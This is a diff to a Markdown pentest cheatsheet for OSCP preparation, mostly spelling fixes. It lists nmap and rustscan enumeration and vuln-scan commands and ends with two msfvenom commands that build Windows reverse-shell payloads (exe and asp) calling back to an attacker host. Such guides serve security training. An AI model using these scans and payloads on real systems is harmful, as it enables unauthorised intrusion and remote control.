airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Full Guide (Enumeration to Priv Escalation).md

 ## Ennumeration
 2. `nmap -sC -sV -p- -Pn $ip --open -oN result`   AND  `rustscan -a $IP .
 3. Check which ports are open.
 Take note of service running and versions(for searchsploit)\
-4. Manual ennumeration.
+4. Manual enumeration.
 Visit the open ports to see if we can get initial foothold information. e.g anoymous login, default login,etc\
-5. Check for vulnerabiltieis on specific ports `nmap -p 80,445,139 --script=*vuln* $IP` , if not results show `nmap -Pn -sC -sV -p 22,2222 --script=*vuln* IP`
+5. Check for vulnerabilties on specific ports `nmap -p 80,445,139 --script=*vuln* $IP` , if not results show `nmap -Pn -sC -sV -p 22,2222 --script=*vuln* IP`
 ## Check vulnerabilities and enumerate for each port
-0. Go to the differnet MD files in the repository .
+0. Go to the differnet MD files in the repository.

-## Creating a reverseshell, uploading a revershell  / creating a stageless payload
+## Creating a reverseshell, uploading a revershell  / creating a stageless payload to gain initial Access
 0. `msfvenom -p windows/shell_reverse_tcp LHOST=myIP LPORT=1237 -f exe  -o reverse.exe`
 1. `msfvenom -p windows/shell_reverse_tcp LHOST=myIP LPORT=1234 -f asp -o reverse.asp`